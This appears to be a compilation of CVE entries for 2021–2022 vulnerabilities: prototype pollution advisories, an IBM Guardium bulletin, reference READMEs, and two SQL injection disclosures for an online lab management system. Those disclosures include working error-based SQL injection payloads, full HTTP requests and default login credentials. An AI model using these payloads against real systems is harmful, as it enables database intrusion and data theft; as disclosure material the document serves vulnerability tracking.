fastest-json-copy version 1.0.1 allows an external attacker to edit or add new properties to an object. This is possible because the application does not correctly validate the incoming JSON keys, thus allowing the `__proto__` property to be edited.

**fastest-json-copy vulnerable to Prototype Pollution**

Moderate severity GitHub Reviewed Published Nov 4, 2022 • Updated Nov 8, 2022

GHSA-p5g9-rjcf-95vj: fastest-json-copy vulnerable to Prototype Pollution

deep-object-diff version 1.1.0 allows an external attacker to edit or add new properties to an object. This is possible because the application does not properly validate incoming JSON keys, thus allowing the `__proto__` property to be edited.

**deep-object-diff vulnerable to Prototype Pollution**

Moderate severity GitHub Reviewed Published Nov 4, 2022 • Updated Nov 8, 2022

GHSA-653v-rqx9-j85p: deep-object-diff vulnerable to Prototype Pollution

"IBM Security Guardium 10.5, 10.6, 11.0, 11.1, 11.2, 11.3, and 11.4 stores user credentials in plain clear text which can be read by a local privileged user. IBM X-Force ID: 215587."

  

**Summary**

IBM Security Guardium has fixed these vulnerabilities.

**Vulnerability Details**

**CVEID:**   CVE-2021-39077  
**DESCRIPTION:**   IBM Security Guardium stores user credentials in plain clear text which can be read by a local privileged user.  
CVSS Base score: 4.4  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/215587 for the current score.  
CVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N)

**CVEID:**   CVE-2019-12406  
**DESCRIPTION:**   Apache CXF is vulnerable to a denial of service, caused by the failure to restrict the number of message attachments present in a given message. By sending a specially-crafted message containing an overly large number of message attachments, a remote attacker could exploit this vulnerability to cause a denial of service condition.  
CVSS Base score: 5.3  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/170974 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L)

**CVEID:**   CVE-2019-12423  
**DESCRIPTION:**   Apache CXF could allow a remote attacker to obtain sensitive information, caused by a flaw when ships with OpenId Connect JWK Keys service. By accessing the JWK keystore file, an attacker could exploit this vulnerability to obtain the public keys in JWK format, and use this information to launch further attacks against the affected system.  
CVSS Base score: 7.5  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/174688 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)

**CVEID:**   CVE-2020-13954  
**DESCRIPTION:**   Apache CXF is vulnerable to cross-site scripting, caused by improper validation of user-supplied input by the services listing page. A remote attacker could exploit this vulnerability using the styleSheetPath in a specially-crafted URL to execute script in a victim's Web browser within the security context of the hosting Web site, once the URL is clicked. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials.  
CVSS Base score: 6.1  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/191650 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)

**CVEID:**   CVE-2020-1954  
**DESCRIPTION:**   Apache CXF is vulnerable to a man-in-the-middle attack, caused by a flaw in JMX Integration. An attacker could exploit this vulnerability to launch a man-in-the-middle attack and gain access to the communication channel between endpoints to obtain sensitive information or further compromise the system.  
CVSS Base score: 5.9  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/178938 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N)

**CVEID:**   CVE-2021-22696  
**DESCRIPTION:**   Apache CXF is vulnerable to a denial of service, caused by improper validation of request\_uri parameter by the OAuth 2 authorization service. By sending a specially-crafted request, a remote attacker could exploit this vulnerability to cause a denial of service condition on the authorization server.  
CVSS Base score: 7.5  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/199335 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)

**CVEID:**   CVE-2021-30468  
**DESCRIPTION:**   Apache CXF is vulnerable to a denial of service, caused by an infinite loop flaw in the JsonMapObjectReaderWriter function. By sending a specially-crafted JSON to a web service, a remote attacker could exploit this vulnerability to consume available CPU resources.  
CVSS Base score: 7.5  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/203830 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)

**CVEID:**   CVE-2016-4658  
**DESCRIPTION:**   The libxml2 library, as used in multiple products, could allow a remote attacker to execute arbitrary code on the system, caused by a memory corruption error. An attacker could exploit this vulnerability using a specially crafted XML document to execute arbitrary code on the system or cause a denial of service.  
CVSS Base score: 9.8  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/117175 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)

**CVEID:**   CVE-2019-11756  
**DESCRIPTION:**   Mozilla Firefox could allow a remote attacker to execute arbitrary code on the system, caused by a use-after-free of SFTKSession object. By persuading a victim to visit a specially-crafted Web site, a remote attacker could exploit this vulnerability using unknown attack vectors to execute arbitrary code on the vulnerable system or cause a denial of service.  
CVSS Base score: 8.8  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/172454 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H)

**CVEID:**   CVE-2019-17006  
**DESCRIPTION:**   Mozilla Network Security Services (NSS), as used in Mozilla Firefox is vulnerable to a heap-based buffer overflow, caused by improper bounds checking when using certain cryptographic primitives. By sending an overly long argument, a remote attacker could overflow a buffer and execute arbitrary code on the system or cause a denial of service.  
CVSS Base score: 8.1  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/174125 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H)

**CVEID:**   CVE-2020-6829  
**DESCRIPTION:**   Mozilla Network Security Services (NSS), as used in Mozilla Firefox could allow a local authenticated attacker to obtain sensitive information, caused by a side-channel attack when ECDSA signatures are generated. An attacker could exploit this vulnerability to extract the position of zero and non-zero wNAF digits while nss-certutil tool performs scalar multiplication and obtain the private key.  
CVSS Base score: 4.4  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/186706 for the current score.  
CVSS Vector: (CVSS:3.0/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:N/A:N)

**CVEID:**   CVE-2019-11719  
**DESCRIPTION:**   Mozilla Firefox could allow a remote attacker to obtain sensitive information, caused by an out-of-bounds read when importing a curve25519 private key in PKCS#8format. By persuading a victim to visit a specially-crafted Web site, a remote attacker could exploit this vulnerability using unknown attack vectors to obtain sensitive information.  
CVSS Base score: 6.5  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/163512 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N)

**CVEID:**   CVE-2017-12624  
**DESCRIPTION:**   Apache CXF is vulnerable to a denial of service. By using a specially crafted message attachment header, a remote attacker could exploit this vulnerability to cause the AX-WS and JAX-RS services stop responding.  
CVSS Base score: 5.3  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/135095 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L)

**CVEID:**   CVE-2018-8039  
**DESCRIPTION:**   Apache CXF could allow a remote attacker to conduct a man-in-the-middle attack. The TLS hostname verification does not work correctly with com.sun.net.ssl interface. An attacker could exploit this vulnerability to launch a man-in-the-middle attack.  
CVSS Base score: 7.5  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/145516 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N)

**Affected Products and Versions**

**Affected Product(s)**

**Version(s)**

IBM Security Guardium

10.5

IBM Security Guardium

10.6

IBM Security Guardium

11.0

IBM Security Guardium

11.1

IBM Security Guardium

11.2

IBM Security Guardium

11.3

IBM Security Guardium

11.4

  

**Workarounds and Mitigations**

None

**References**

Off

**Acknowledgement**

John Zuccato, Rodney Ryan, Chris Shepherd, Nathan Roane, Vince Dragnea, Troy Fisher, Gabor Minyo, Geoffrey Owden, and Ben Goodspeed from the IBM X-Force Ethical Hacking Team., John Zuccato, Rodney Ryan, Chris Shepherd, Nathan Roane, Vince Dragnea, Tr

**Change History**

18 Apr 2022: Initial Publication  
11 May 2022: Second Publication  
27 May 2022: Third Publication  
22 Sep 2022: Fourth Publication

\*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.

**Disclaimer**

According to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an "industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response." IBM PROVIDES THE CVSS SCORES ""AS IS"" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. "Affected Products and Versions" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.

**Document Location**

Worldwide

\[{"Business Unit":{"code":"BU059","label":"IBM Software w\\/o TPS"},"Product":{"code":"SSMPHH","label":"IBM Security Guardium"},"Component":"","Platform":\[{"code":"PF016","label":"Linux"}\],"Version":"10.5, 10.6, 11.0, 11.1, 11.2, 11.3, 11.4","Edition":"","Line of Business":{"code":"LOB24","label":"Security Software"}}\]

CVE-2021-39077: IBM Security Guardium is affected by multiple vulnerabilities

Online Diagnostic Lab Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /classes/Master.php?f=delete_appointment.

**Online Diagnostic Lab Management System v1.0 by oretnom23 has SQL injection**

BUG\_Author: YorkLee

Login account: admin/admin123 (Super Admin account)

Login account: cblake@sample.com/cblake123 (General account)

vendors: https://www.sourcecodester.com/php/15129/online-diagnostic-lab-management-system-php-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /odlms/classes/Master.php?f=delete\_appointment

Vulnerability location: /odlms/classes/Master.php?f=delete\_appointment,id

dbname=odlms\_db,length=8

\[+\] Payload: id=4' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

POST /odlms/classes/Master.php?f\=delete\_appointment HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: application/json, text/javascript, \*/\*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.88/odlms/admin/?page=appointments
Content-Length: 66
Cookie: PHPSESSID=5g4g4dffu1bkrg9jm7nr42ori2
Connection: close
id=4'  and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+

CVE-2022-43062: Cve_report/SQLi-1.md at main · YorkLee53645349/Cve_report

Online Diagnostic Lab Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /classes/Users.php?f=delete_client.

**Online Diagnostic Lab Management System v1.0 by oretnom23 has SQL injection**

BUG\_Author: YorkLee

Login account: admin/admin123 (Super Admin account)

Login account: cblake@sample.com/cblake123 (General account)

vendors: https://www.sourcecodester.com/php/15129/online-diagnostic-lab-management-system-php-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /odlms/classes/Users.php?f=delete\_client

Vulnerability location: /odlms/classes/Users.php?f=delete\_client,id

dbname=odlms\_db,length=8

\[+\] Payload: id=1' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

POST /odlms/classes/Users.php?f\=delete\_client HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: application/json, text/javascript, \*/\*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.88/odlms/admin/?page=appointments
Content-Length: 66
Cookie: PHPSESSID=5g4g4dffu1bkrg9jm7nr42ori2
Connection: close
id=1'  and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+

CVE-2022-43063: Cve_report/SQLi-2.md at main · YorkLee53645349/Cve_report

Zettlr version 2.3.0 allows an external attacker to remotely obtain arbitrary local files on any client that attempts to view a malicious markdown file through Zettlr. This is possible because the application does not have a CSP policy (or at least not strict enough) and/or does not properly validate the contents of markdown files before rendering them.

**  
Zettlr \[_ˈset·lər_\]**

**A Markdown Editor for the 21st century**.

     

Homepage | Download | Documentation | Discord | Contributing | Support Us

With Zettlr, writing professional texts is easy and motivating: Whether you are a college student, a researcher, a journalist, or an author — Zettlr has the right tools for you. Watch the video or continue reading to see what they are!

Visit our Website.

**Features**

*   Available in over a dozen languages
*   Tight and ever-growing **integration with your favourite reference manager** (such as Zotero or JabRef)
*   **Cite with Zettlr** using citeproc and your existing literature database
*   Five **themes and dark mode support**
*   File-agnostic writing: Enjoy **full control over your own files**
*   Keep all your notes and texts **in one place** — searchable and accessible
*   **Code highlighting** for many languages
*   Simple and beautiful **exports** with Pandoc, LaTeX, and Textbundle
*   Support for state of the art knowledge management techniques (**Zettelkasten**)
*   A revolutionary **search algorithm** with integrated heatmap

… and the best is: **Zettlr is Open Source (FOSS)!**

**Installation**

To install Zettlr, just download the latest release for your operating system! Currently supported are macOS, Windows, and most Linux distributions (via Debian- and Fedora-packages as well as AppImages).

All other platforms that Electron supports are supported as well, but you will need to build the app yourself for this to work.

**Please also consider becoming a patron or making a one-time donation!**

**Getting Started**

After you have installed Zettlr, head over to our documentation to get to know Zettlr. Refer to the Quick Start Guide, if you prefer to use software heads-on.

**Contributing**

Zettlr is an Electron\-based app, so to start developing, you'll need to have:

1.  A NodeJS\-stack installed on your computer. Make sure it's at least Node 14 (lts/fermium). To test what version you have, run node -v.
2.  Yarn installed. Yarn is the required package manager for the project, as we do not commit package-lock.json\-files and many commands require yarn. You can install this globally using npm install -g yarn or Homebrew, if you are on macOS.

Then, simply clone the repository and install the dependencies on your local computer:

$ git clone https://github.com/Zettlr/Zettlr.git
$ cd Zettlr
$ yarn install --frozen-lockfile

The --frozen-lockfile flag ensures that yarn will stick to the versions as listed in the yarn.lock and not attempt to update them.

During development, hot module reloading is active so that you can edit the renderer's code easily and hit F5 after the changes have been compiled by electron-forge. You can keep the developer tools open to see when HMR has finished loading your changes.

**What Should I Know To Contribute Code?**

In order to provide code, you should have basic familiarity with the following topics and/or manuals (ordered by importance descending):

*   JavaScript (especially asynchronous code) and TypeScript
*   Node.js
*   Electron
*   Vue.js (2.x) and Vuex
*   CodeMirror (5.x)
*   ESLint
*   LESS
*   Webpack 5.x
*   Electron forge
*   Electron builder

> Note: See the "Directory Structure" section below to get an idea of how Zettlr specifically works.

**Development Commands**

This section lists all available commands that you can use during application development. These are defined within the package.json and can be run from the command line by prefixing them with yarn. Run them from within the base directory of the repository.

**start**

Starts electron-forge, which will build the application and launch it in development mode. This will use the normal settings, so if you use Zettlr on the same computer in production, it will use the same configuration files as the regular application. This means: be careful when breaking things. In that case, it's better to use test-gui.

**package**

Packages the application, but not bundle it into an installer. Without any suffix, this command will package the application for your current platform and architecture. To create specific packages (may require running on the corresponding platform), the following suffixes are available:

*   package:mac-x64 (Intel-based Macs)
*   package:mac-arm (Apple Silicon-based Macs)
*   package:win-x64 (Intel-based Windows)
*   package:win-arm (ARM-based Windows)
*   package:linux-x64 (Intel-based Linux)
*   package:linux-arm (ARM-based Linux)

The resulting application packages are stored in ./out.

> This command will skip typechecking to speed up builds, so be extra cautious.

**release:{platform-arch}**

Packages the application and then bundles it into an installer for the corresponding platform and architecture. To create such a bundle (may require running on the corresponding platform), one of the following values for {platform-arch} is required:

*   release:mac-x64 (Intel-based Macs)
*   release:mac-arm (Apple Silicon-based Macs)
*   release:win-x64 (Intel-based Windows)
*   release:win-arm (ARM-based Windows)
*   release:linux-x64 (Intel-based Linux)
*   release:linux-arm (ARM-based Linux)

The resulting setup bundles are stored in ./release.

> Please note that, while you can package directly for your platform without any suffix, for creating a release specifying the platform is required as electron-builder would otherwise include the development-dependencies in the app.asar, resulting in a bloated application.

**lang:refresh**

This downloads the four default translations of the application from Zettlr Translate, with which it is shipped by default. It places the files in the static/lang\-directory. Currently, the default languages are: German (Germany), English (USA), English (UK), and French (France).

> Please note, that this command is intended for an automated workflow that runs from time to time on the repository to perform this action. This means: Do **not** commit updated files to the repository. Instead, the updated files will be downloaded whenever you git fetch.

**csl:refresh**

This downloads the Citation Style Language (CSL) files with which the application is shipped, and places them in the static/csl-locales\- and static/csl-styles\-directories respectively.

> Please note, that this command is intended for an automated workflow that runs from time to time on the repository to perform this action. This means: Do **not** commit updated files to the repository. Instead, the updated files will be downloaded whenever you git fetch.

**lint**

This simply runs ESLint. Apps such as Atom or Visual Studio Code will automatically run ESLint in the background, but if you want to be extra-safe, make sure to run this command prior to submitting a Pull Request.

> This command will run automatically on each Pull Request to check your code for inconsistencies.

**reveal:build**

This re-compiles the source-files needed by the exporter for building reveal.js\-presentations. Due to the nature of how Pandoc creates such presentations, Zettlr needs to modify the output by Pandoc, which is why these files need to be pre-compiled.

> Please note, that this command is intended for an automated workflow that runs from time to time on the repository to perform this action. This means: Do **not** commit updated files to the repository. Instead, the updated files will be downloaded whenever you git fetch.

**test**

This runs the unit tests in the directory ./test. Make sure to run this command prior to submitting a Pull Request, as this will be run every time you commit to the PR, and this way you can make sure that your changes don't break any tests, making the whole PR-process easier.

**test-gui**

Use this command to carefree test any changes you make to the application. This command will start the application as if you ran yarn start, but will provide a custom configuration and a custom directory.

> This command will skip typechecking to speed up builds, so be extra cautious.

**The first time you start this command**, pass the --clean\-flag to copy a bunch of test-files to your ./resources\-directory, create a test-config.yml in your project root, and start the application with this clean configuration. Then, you can adapt the test-config.yml to your liking (so that certain settings which you would otherwise _always_ set will be pre-set without you having to open the preferences).

Whenever you want to reset the test directory to its initial state (or you removed the directory, or cloned the whole project anew), pass the flag --clean to the command in order to create or reset the directory. **This is also necessary if you changed something in test-config.yml**.

You can pass additional command-line switches such as --clear-cache to this command as well. They will be passed to the child process.

> Attention: Before first running the command, you **must** run it with the --clean\-flag to create the directory in the first place!

Additionally, have a look at our full development documentation.

**Directory Structure**

Zettlr is a mature app that has amassed hundreds of directories over the course of its development. Since it is hard to contribute to an application without any guidance, we have compiled a short description of the directories with how they interrelate.

    .
    ├── resources                      # Contains resource files
    │   ├── NSIS                       # Images for the Windows installer
    │   ├── icons                      # Icons used to build the application
    │   ├── screenshots                # The screenshots used in this README file
    ├── scripts                        # Scripts that are run by the CI and some YARN commands
    │   ├── assets                     # Asset files used by some scripts
    │   └── test-gui                   # Test files used by `yarn test-gui`
    ├── source                         # Contains the actual source code for the app
    │   ├── app                        # Contains service providers and the boot/shutdown routines
    │   ├── common                     # Common files used by several or all renderer processes
    │   │   ├── fonts                  # Contains the font files (note: location will likely change)
    │   │   ├── img                    # Currently unused image files
    │   │   ├── less                   # Contains the themes (note: location will likely change)
    │   │   ├── modules                # Contains renderer modules
    │   │   │   ├── markdown-editor    # The central CodeMirror markdown editor
    │   │   │   ├── preload            # Electron preload files
    │   │   │   └── window-register    # Run by every renderer during setup
    │   │   ├── util                   # A collection of utility functions
    │   │   └── vue                    # Contains Vue components used by the graphical interface
    │   ├── main                       # Contains code for the main process
    │   │   ├── assets                 # Static files (note: location will likely change)
    │   │   ├── commands               # Commands that perform user-actions, run from within zettlr.ts
    │   │   └── modules                # Main process modules
    │   │       ├── document-manager   # The document manager handles all open files
    │   │       ├── export             # The exporter converts Markdown files into other formats
    │   │       ├── fsal               # The File System Abstraction Layer provides the file tree
    │   │       ├── import             # The importer converts other formats into Markdown files
    │   │       └── window-manager     # The window manager manages all application windows
    │   ├── win-about                  # Code for the About window
    │   ├── win-custom-css             # Code for the Custom CSS window
    │   ├── win-defaults               # Code for the defaults file editor
    │   ├── win-error                  # The error modal window
    │   ├── win-log-viewer             # Displays the running logs from the app
    │   ├── win-main                   # The main window
    │   ├── win-paste-image            # The modal displayed when pasting an image
    │   ├── win-preferences            # The preferences window
    │   ├── win-print                  # Code for the print and preview window
    │   ├── win-quicklook              # Code for the Quicklook windows
    │   ├── win-stats                  # Code for the general statistics window
    │   ├── win-tag-manager            # Code for the tag manager
    │   └── win-update                 # The dedicated update window
    ├── static                         # Contains static files, cf. the README-file in there
    └── test                           # Unit tests
    

**On the Distinction between Modules and Service Providers**

You'll notice that Zettlr contains both "modules" and "service providers". The difference between the two is simple: Service providers run in the main process and are completely autonomous while providing functionality to the app as a whole. Modules, on the other hand, provide functionality that must be triggered by user actions (e.g. the exporter and the importer).

**The Application Lifecycle**

Whenever you run Zettlr, the following steps will be executed:

0.  Execute source/main.ts
1.  Environment check (source/app/lifecycle.ts::bootApplication)
2.  Boot service providers (source/app/lifecycle.ts::bootApplication)
3.  Boot main application (source/main/zettlr.ts)
4.  Load the file tree and the documents
5.  Show the main window

And when you shut down the app, the following steps will run:

1.  Close all windows except the main window
2.  Attempt to close the main window
3.  Shutdown the main application (source/main/zettlr.ts::shutdown)
4.  Shutdown the service providers (source/app/lifecycle.ts::shutdownApplication)
5.  Exit the application

During development of the app (yarn start and yarn test-gui), the following steps will run:

1.  Electron forge will compile the code for the main process and each renderer process separately (since these are separate processes), using TypeScript and webpack to compile and transpile.
2.  Electron forge will put that code into the directory .webpack, replacing the constants you can find in the "create"-methods of the window manager with the appropriate entry points.
3.  Electron forge will start a few development servers to provide hot module reloading (HMR) and then actually start the application.

Whenever the app is built, the following steps will run:

1.  Electron forge will perform steps 1 and 2 above, but instead of running the app, it will package the resulting code into a functional app package.
2.  Electron builder will then take these pre-built packages and wrap them in a platform-specific installer (DMG-files, Windows installer, or Linux packages).

Electron forge will put the packaged applications into the directory ./out while Electron builder will put the installers into the directory ./release.

**Command-Line Switches**

The Zettlr binary features a few command line switches that you can make use of for different purposes.

**--launch-minimized**

This CLI flag will instruct Zettlr not to show the main window on start. This is useful to create autostart entries. In that case, launching Zettlr with this flag at system boot will make sure that you will only see its icon in the tray.

Since this implies the need to have the app running in the tray bar or notification area when starting the app like this, it will automatically set the corresponding setting system.leaveAppRunning to true.

> Note: This flag will not have any effect on Linux systems which do not support displaying an icon in a tray bar or notification area.

**--clear-cache**

This will direct the File System Abstraction Layer to fully clear its cache on boot. This can be used to mitigate issues regarding changes in the code base. To ensure compatibility with any changes to the information stored in the cache, the cache is also automatically cleared when the version field in your config.json does not match the one in the package.json, which means that, as long as you do not explicitly set the version\-field in your test-config.yml, the cache will always be cleared on each run when you type yarn test-gui.

**--data-dir=path**

Use this switch to specify custom data directory, which holds your configuration files. Without this switch data directory defaults to %AppData%/Zettlr (on Windows 10), ~/.config/Zettlr (on Linux), etc. The path can be absolute or relative. Basis for the relative path will be either the binary's directory (when running a packaged app) or the repository root directory (when running an app that is not packaged). If the path contains spaces, do not forget to escape it in quotes. ~ to denote home directory does not work. Due to the bug in Electron an empty Dictionaries subdirectory is created in the default data directory, but it does not impact functionality.

**--disable-hardware-acceleration**

This switch causes Zettlr to disable hardware acceleration, which could be necessary in certain setups. For more information on why this flag was added, see issue #2127.

**VSCode Extension Recommendations**

This repository makes use of Visual Studio Code's recommended extensions feature. This means: If you use VS Code and open the repository for the first time, VS Code will tell you that the repository recommends to install a handful of extensions. These extensions are recommended if you work with Zettlr and will make contributing much easier. The recommendations are specified in the file .vscode/extensions.json.

Since installing extensions is sometimes a matter of taste, we have added short descriptions for each recommended extension within that file to explain why we recommend it. This way you can make your own decision whether or not you want to install any of these extensions (for example, the SVG extension is not necessary if you do not work with the SVG files provided in the repository).

If you choose not to install all of the recommended extensions at once (which we recommend), VS Code will show you the recommendations in the extensions sidebar so you can first decide which of the ones you'd like to install and then manually install those you'd like to have.

> Using the same extensions as the core developer team will make the code generally more consistent since you will have the same visual feedback.

**License**

This software is licensed via the GNU GPL v3-License.

The brand (including name, icons and everything Zettlr can be identified with) is excluded and all rights reserved. If you want to fork Zettlr to develop another app, feel free but please change name and icons. Read about the logo usage.

CVE-2022-40276: GitHub - Zettlr/Zettlr: A Markdown Editor for the 21st century.

deep-parse-json version 1.0.2 allows an external attacker to edit or add new properties to an object. This is possible because the application does not correctly validate the incoming JSON keys, thus allowing the '__proto__' property to be edited.

**deep-parse-json**

Recursively parses a stringified json and returns javascript object

**Usage**

      npm install --save deep-parse-json
      or
      yarn add deep-parse-json
    

      const { deepParseJson } = require('deep-parse-json')
      const stringified = '{"personList":"[{\\"name\\":\\"siba\\"},{\\"name\\":\\"bhaskar\\"}]"}'
      console.log(deepParseJson(stringified))
      // { personList: [ { name: 'siba' }, { name: 'bhaskar' } ] }

CVE-2022-42743: GitHub - sibu-github/deep-parse-json: Javascript function which recursively parses stringified json

fastest-json-copy version 1.0.1 allows an external attacker to edit or add new properties to an object. This is possible because the application does not correctly validate the incoming JSON keys, thus allowing the '__proto__' property to be edited.

**fastest-json-copy**

*   Fastest JSON deep clone implementation for Node.js
*   Goal of this project is to track and maintain the fastest deep cloning function for plain JavaScript objects (POJOs), aka JSON objects.
*   Keeps track of benchmarks of all other implementations.

**Usage**

Install

    yarn add fastest-json-copy
    

Use

import {copy} from 'fastest-json-copy';

copy({foo: 'bar'});

**Performance**

For primitive values, 10x faster than fast-copy and 70x faster than JSON.parse(JSON.stringify).

    node benchmarks/primitives.js 
    1. fastest-json-copy (v1) x 14,841,253 ops/sec ±0.65% (92 runs sampled)
    2. fastest-json-copy (v2) x 14,092,359 ops/sec ±0.64% (91 runs sampled)
    3. fast-copy x 1,486,431 ops/sec ±2.26% (92 runs sampled)
    4. JSON.parse(JSON.stringify) x 211,240 ops/sec ±0.76% (88 runs sampled)
    5. lodash.cloneDeep x 3,767,042 ops/sec ±1.06% (92 runs sampled)
    6. fast-clone x 16,377,211 ops/sec ±0.86% (91 runs sampled)
    7. deepclone x 4,283,380 ops/sec ±0.84% (91 runs sampled)
    8. fast-deepclone x 2,668,417 ops/sec ±0.70% (89 runs sampled)
    Fastest is 6. fast-clone
    

For small objects, 3x faster than fast-copy and 10x faster than JSON.parse(JSON.stringify).

    node benchmarks/small-values.js 
    1. fastest-json-copy (v1) x 1,829,560 ops/sec ±1.78% (91 runs sampled)
    2. fastest-json-copy (v2) x 1,811,327 ops/sec ±0.86% (93 runs sampled)
    3. fast-copy x 547,079 ops/sec ±1.95% (88 runs sampled)
    4. JSON.parse(JSON.stringify) x 182,498 ops/sec ±0.72% (90 runs sampled)
    5. lodash.cloneDeep x 220,452 ops/sec ±1.43% (91 runs sampled)
    6. fast-clone x 139,153 ops/sec ±1.04% (87 runs sampled)
    7. deepclone x 229,912 ops/sec ±1.03% (89 runs sampled)
    8. fast-deepclone x 153,742 ops/sec ±0.74% (90 runs sampled)
    Fastest is 1. fastest-json-copy (v1)
    

For large objects, 3x faster than fast-copy and 5x faster than JSON.parse(JSON.stringify).

    node benchmarks/large-values.js 
    1. fastest-json-copy (v1) x 47,361 ops/sec ±1.98% (92 runs sampled)
    2. fastest-json-copy (v2) x 47,662 ops/sec ±0.77% (89 runs sampled)
    3. fast-copy x 18,639 ops/sec ±1.55% (89 runs sampled)
    4. JSON.parse(JSON.stringify) x 10,399 ops/sec ±0.78% (90 runs sampled)
    5. lodash.cloneDeep x 6,284 ops/sec ±0.79% (91 runs sampled)
    6. fast-clone x 6,437 ops/sec ±0.70% (92 runs sampled)
    7. deepclone x 5,809 ops/sec ±0.75% (91 runs sampled)
    8. fast-deepclone x 5,057 ops/sec ±0.82% (89 runs sampled)
    Fastest is 2. fastest-json-copy (v2),1. fastest-json-copy (v1)
    

**License**

MIT © Vadim Dalecky.

CVE-2022-41714: GitHub - streamich/fastest-json-copy: Fastest JSON deep clone implementation

deep-object-diff version 1.1.0 allows an external attacker to edit or add new properties to an object. This is possible because the application does not properly validate incoming JSON keys, thus allowing the '__proto__' property to be edited.

**deep-object-diff**

❄️

Deep diff two JavaScript Objects

     

A small library that can deep diff two JavaScript Objects, including nested structures of arrays and objects.

**Installation**

yarn add deep-object-diff

npm i --save deep-object-diff

**Functions available:**

*   diff(originalObj, updatedObj) returns the difference of the original and updated objects
    
*   addedDiff(original, updatedObj) returns only the values added to the updated object
    
*   deletedDiff(original, updatedObj) returns only the values deleted in the updated object
    
*   updatedDiff(original, updatedObj) returns only the values that have been changed in the updated object
    
*   detailedDiff(original, updatedObj) returns an object with the added, deleted and updated differences
    

**Importing**

